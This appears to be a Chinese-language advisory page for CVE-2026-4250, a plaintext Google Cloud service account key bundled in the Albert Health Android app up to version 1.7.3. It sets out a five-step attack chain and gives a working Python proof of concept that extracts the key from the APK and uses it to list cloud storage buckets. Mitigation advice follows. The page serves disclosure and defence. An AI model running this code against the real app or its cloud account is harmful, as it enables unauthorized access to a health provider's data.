CVE-2026-4250: Albert Health Android应用Google Cloud服务账号密钥硬编码漏洞

漏洞信息

漏洞编号

CVE-2026-4250

漏洞类型

凭证/密钥存储不当

CVSS评分

2.5 低危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Albert Health (Albert Sağlık Hizmetleri ve Ticaret Albert Health)

漏洞概述

CVE-2026-4250是发现于Albert Health Android应用（1.7.3及之前版本）中的一个中低危安全漏洞。该漏洞存在于Google Cloud Service Account Key Handler组件中，涉及文件resources/assets/service-account.json的不安全存储问题。攻击者通过本地访问方式，利用该应用对Google Cloud服务账号凭证的不当存储，可以获取明文保存的认证密钥，从而可能访问相关的Google Cloud服务资源。由于攻击复杂度较高且需要本地访问权限，单个用户的机密性影响较低，但已公开的漏洞利用代码增加了实际威胁风险。厂商在收到早期通知后未做出任何回应。

技术细节

该漏洞的核心问题在于Albert Health Android应用将Google Cloud服务账号密钥以明文形式硬编码或存储在应用资源文件resources/assets/service-account.json中。在Android应用中，resources/assets目录下的文件通常可以通过多种途径被访问，包括：1) 使用文件管理器应用直接浏览应用数据目录；2) 通过ADB调试接口提取应用APK并解压获取资源文件；3) 利用其他恶意应用读取同一设备上已安装应用的数据目录。服务账号密钥通常包含private_key_id、private_key、client_email等敏感信息，一旦泄露，攻击者可以使用这些凭证以服务账号身份调用Google Cloud API，执行如访问Cloud Storage存储桶、查询BigQuery数据集等操作。由于CVSS向量显示攻击复杂度为高(AC:H)，且需要低权限本地访问(PR:L)，实际利用需要攻击者具备较高的技术能力和物理或Root访问权限。

攻击链分析

STEP 1

步骤1: 获取APK文件

攻击者通过应用市场下载、ADB调试接口或其他渠道获取目标应用的APK安装包文件

STEP 2

步骤2: 解压APK提取凭证

使用zipfile等工具解压APK文件，读取resources/assets/service-account.json文件内容，获取明文存储的Google Cloud服务账号密钥

STEP 3

步骤3: 解析密钥信息

解析JSON格式的服务账号凭证，提取private_key_id、private_key、client_email等关键认证信息

STEP 4

步骤4: 构造认证请求

使用提取的私钥通过Google OAuth2.0服务账号认证流程，获取有效的访问令牌

STEP 5

步骤5: 滥用云服务权限

利用获取的认证令牌调用Google Cloud API，访问原本需要授权的云资源，如Cloud Storage存储桶、BigQuery数据集或其他配置的云服务

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2026-4250 PoC - Albert Health Service Account Key Extraction
# This PoC demonstrates the credential exposure vulnerability

import os
import zipfile
import json
import requests
from google.oauth2 import service_account
from google.cloud import storage

def extract_apk_credentials(apk_path):
    """Extract service account credentials from APK file"""
    try:
        with zipfile.ZipFile(apk_path, 'r') as zip_ref:
            # Target file path in the APK
            target_file = 'assets/service-account.json'
            if target_file in zip_ref.namelist():
                credential_data = zip_ref.read(target_file)
                return json.loads(credential_data)
    except Exception as e:
        print(f"Error extracting APK: {e}")
    return None

def exploit_google_cloud(credentials):
    """Use leaked credentials to access Google Cloud services"""
    try:
        # Authenticate with leaked service account
        scopes = ['https://www.googleapis.com/auth/cloud-platform']
        credentials_obj = service_account.Credentials.from_service_account_info(
            credentials, scopes=scopes
        )
        
        # List accessible Cloud Storage buckets
        storage_client = storage.Client(credentials=credentials_obj)
        buckets = list(storage_client.list_buckets())
        
        print(f"[+] Successfully authenticated as: {credentials.get('client_email')}")
        print(f"[+] Found {len(buckets)} accessible storage buckets:")
        for bucket in buckets:
            print(f"    - {bucket.name}")
            
        return True
    except Exception as e:
        print(f"[-] Failed to access Google Cloud: {e}")
    return False

def main():
    print("=" * 60)
    print("CVE-2026-4250 PoC - Albert Health Credential Exposure")
    print("=" * 60)
    
    # Step 1: Extract credentials from APK or installed app
    apk_path = "albert-health-v1.7.3.apk"
    
    print("\n[Step 1] Extracting service account credentials...")
    creds = extract_apk_credentials(apk_path)
    
    if creds:
        print(f"[+] Found credentials for: {creds.get('client_email')}")
        print(f"[+] Private Key ID: {creds.get('private_key_id')}")
        
        # Step 2: Exploit to access Google Cloud
        print("\n[Step 2] Attempting to access Google Cloud services...")
        exploit_google_cloud(creds)
    else:
        print("[-] Failed to extract credentials")

if __name__ == "__main__":
    main()

影响范围

Albert Health Android应用 <= 1.7.3

防御指南

临时缓解措施

由于该漏洞需要本地访问权限，建议用户确保设备安全：1) 避免使用Root权限设备；2) 仅从官方应用商店安装应用；3) 启用设备加密和安全启动功能；4) 定期检查应用权限请求；5) 监控Google Cloud账户的异常API调用活动。对于已泄露的服务账号密钥，应立即在Google Cloud Console中禁用并轮换，同时审查相关资源访问日志排查潜在的安全事件。